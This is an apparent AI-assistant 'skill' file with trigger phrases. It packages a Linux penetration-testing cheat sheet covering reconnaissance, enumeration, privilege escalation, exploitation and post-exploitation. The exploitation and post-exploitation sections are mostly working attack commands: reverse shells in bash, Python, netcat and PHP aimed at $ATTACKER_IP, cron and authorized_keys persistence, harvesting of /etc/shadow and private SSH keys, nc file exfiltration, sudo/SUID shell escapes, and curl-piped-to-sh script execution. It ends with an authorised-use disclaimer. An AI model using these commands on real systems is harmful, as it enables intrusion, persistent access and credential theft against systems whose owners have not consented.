Practical Linux command reference and penetration testing notes for reconnaissance, enumeration, exploitation, and privilege escalation
---
name: linux-pentesting-commands
description: Practical Linux command reference for penetration testing, reconnaissance, exploitation, and privilege escalation
triggers:
- how do I enumerate services on a Linux system
- show me privilege escalation commands for Linux
- what reconnaissance commands should I use for pentesting
- help me with Linux post-exploitation techniques
- show me Linux enumeration commands for pentesting
- what commands do I need for Linux CTF challenges
- guide me through Linux pentesting reconnaissance
- how to find SUID binaries for privilege escalation
---
# Linux Pentesting Commands Skill
> Skill by [ara.so](https://ara.so) — Security Skills collection.
## Overview
**Linux for a Pentester** is a curated collection of practical Linux commands and techniques for penetration testing. This repository organizes commands by penetration testing phases: reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation. It's designed as a quick reference guide for CTF challenges, vulnerability assessments, and security audits.
## Repository Structure
The project is organized into focused modules:
- **00-General-Commands/** - Essential Linux survival commands
- **01-Recon/** - Local and network reconnaissance
- **02-Enumeration/** - Service and user data enumeration
- **03-Exploitation/** - Initial access and shell techniques
- **04-Privilege-Escalation/** - Privilege escalation vectors
- **05-Post-Exploitation/** - Persistence and lateral movement
- **Cheatsheets/** - Quick reference one-liners
## Installation & Setup
```bash
# Clone the repository
git clone https://github.com/HIMANSHUSHARMA20/Linux-for-a-Pentester.git
cd Linux-for-a-Pentester
# Navigate to specific modules as needed
cd 01-Recon/
cd 04-Privilege-Escalation/
```
## Key Command Categories
### General System Commands
Essential commands for system navigation and basic reconnaissance:
```bash
# System information
uname -a # Kernel version and system info
cat /etc/os-release # OS distribution details
hostname # System hostname
whoami # Current user
id # User and group IDs
w # Who is logged in
last # Login history
# File system navigation
find / -name flag.txt 2>/dev/null # Find files by name
find / -type f -perm -4000 2>/dev/null # Find SUID binaries
locate *.conf # Quick file location
which python python3 # Find binary paths
```
### Reconnaissance Phase
Commands for initial system and network discovery:
```bash
# Network reconnaissance
ip a # Network interfaces
ifconfig # Network configuration (legacy)
netstat -tulpn # Active connections and listening ports
ss -tulpn # Socket statistics (modern alternative)
route -n # Routing table
arp -a # ARP cache
# Process enumeration
ps aux # All running processes
ps -ef --forest # Process tree view
top # Real-time process monitor
pstree # Process hierarchy
# Service discovery
systemctl list-units --type=service # SystemD services
service --status-all # SysV services
cat /etc/services # Service port mappings
```
### Enumeration Techniques
Deep-dive commands for service and configuration analysis:
```bash
# User enumeration
cat /etc/passwd # System users
cat /etc/group # User groups
cat /etc/shadow # Password hashes (requires root)
grep -v -E "^#|^$" /etc/passwd # Clean user list
# Configuration files
find /etc -name "*.conf" 2>/dev/null # All config files
cat /etc/ssh/sshd_config # SSH configuration
cat /etc/crontab # Scheduled tasks
ls -la /etc/cron.* # Cron directories
# File capabilities and permissions
getcap -r / 2>/dev/null # Files with capabilities
find / -perm -2 -type f 2>/dev/null # World-writable files
find / -perm -4000 -type f 2>/dev/null # SUID binaries
find / -perm -6000 -type f 2>/dev/null # SUID + SGID binaries
# Environment and history
env # Environment variables
cat ~/.bash_history # Command history
cat ~/.bashrc # Bash configuration
```
### Privilege Escalation Vectors
Commands to identify privilege escalation opportunities:
```bash
# SUID/SGID exploitation
find / -perm -u=s -type f 2>/dev/null # SUID files
find / -perm -g=s -type f 2>/dev/null # SGID files
# Common SUID escalation examples
/usr/bin/find . -exec /bin/sh -p \; -quit # Find SUID abuse
/usr/bin/vim -c ':!/bin/sh' # Vim escape
/usr/bin/nmap --interactive # Nmap older versions
# Sudo enumeration
sudo -l # Sudo permissions
cat /etc/sudoers # Sudoers file (if readable)
# Sudo abuse examples (GTFOBins patterns)
sudo find . -exec /bin/sh \; -quit
sudo vim -c ':!/bin/sh'
sudo awk 'BEGIN {system("/bin/sh")}'
sudo python -c 'import os; os.system("/bin/sh")'
# Kernel exploits
uname -a # Kernel version
cat /proc/version # Detailed version info
searchsploit linux kernel $(uname -r) # Search for exploits
# Cron job abuse
cat /etc/crontab # System cron
ls -la /etc/cron.d # Cron directories
crontab -l # User crontab
pspy64 # Monitor processes (if available)
# Capabilities abuse
/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")' # If cap_setuid
```
### Exploitation Techniques
Commands for gaining initial access and establishing shells:
```bash
# Reverse shells
bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ATTACKER_IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
nc -e /bin/sh $ATTACKER_IP 4444
php -r '$sock=fsockopen("$ATTACKER_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
# Shell stabilization
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
# Ctrl+Z to background
stty raw -echo; fg
reset
# File transfers
# On attacker
python3 -m http.server 8000
nc -lvnp 4444 > file
# On target
wget http://$ATTACKER_IP:8000/file
curl http://$ATTACKER_IP:8000/file -o file
nc $ATTACKER_IP 4444 < file
```
### Post-Exploitation Activities
Commands for persistence and lateral movement:
```bash
# Persistence mechanisms
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1'" | crontab -
echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys
echo "* * * * * root /bin/bash -c 'bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1'" >> /etc/crontab
# Credential harvesting
cat /home/*/.bash_history # User command history
cat /home/*/.ssh/id_rsa # Private SSH keys
find / -name "*.bak" 2>/dev/null # Backup files
find / -name "password*" 2>/dev/null # Password files
grep -r "password" /var/www/html 2>/dev/null # Web configs
# Lateral movement
ssh -i id_rsa user@$TARGET_IP # SSH with key
ssh user@$TARGET_IP # SSH with password
su - otheruser # Switch user
```
## Common Patterns
### Full System Enumeration Script
```bash
#!/bin/bash
echo "[*] System Information"
uname -a
cat /etc/os-release
echo "[*] Current User"
id
sudo -l 2>/dev/null
echo "[*] Network Configuration"
ip a
netstat -tulpn 2>/dev/null || ss -tulpn
echo "[*] SUID Binaries"
find / -perm -4000 -type f 2>/dev/null
echo "[*] Writable Directories"
find / -writable -type d 2>/dev/null | grep -v proc
echo "[*] Cron Jobs"
cat /etc/crontab
ls -la /etc/cron.*
echo "[*] Interesting Files"
find / -name "*.conf" 2>/dev/null | head -20
find / -name "*password*" 2>/dev/null | head -20
```
### Quick Privilege Escalation Check
```bash
# One-liner for quick wins
(sudo -l; find / -perm -4000 2>/dev/null; cat /etc/crontab; getcap -r / 2>/dev/null) | tee priv_check.txt
```
## Troubleshooting
### Command Not Found
```bash
# If a command is missing, try alternatives
netstat → ss
ifconfig → ip
which → whereis
locate → find
```
### Permission Denied Errors
```bash
# Redirect errors to null
find / -name flag.txt 2>/dev/null
# Or capture both stdout and stderr separately
command > output.txt 2> errors.txt
```
### Shell Not Interactive
```bash
# Upgrade to fully interactive shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
# or
script -qc /bin/bash /dev/null
```
## Integration with Pentesting Tools
This command reference complements tools like:
- **LinPEAS** - Automated privilege escalation scanner
- **LinEnum** - Linux enumeration script
- **pspy** - Process monitoring without root
- **GTFOBins** - Unix binaries exploitation database
```bash
# Running automated tools
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh && bash LinEnum.sh
```
## Best Practices
1. **Always redirect errors** when searching filesystem: `2>/dev/null`
2. **Check sudo permissions first**: `sudo -l` is often overlooked
3. **Enumerate thoroughly** before exploiting - know your target
4. **Document findings** as you go - useful for reports
5. **Use TAB completion** to avoid typos in critical commands
6. **Stabilize shells immediately** after getting initial access
## Resources
- GTFOBins: https://gtfobins.github.io/
- HackTricks: https://book.hacktricks.xyz/
- PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings
---
**Note**: These commands are for authorized penetration testing and educational purposes only. Always obtain proper authorization before testing any system.
Creator's repository · aradotso/security-skills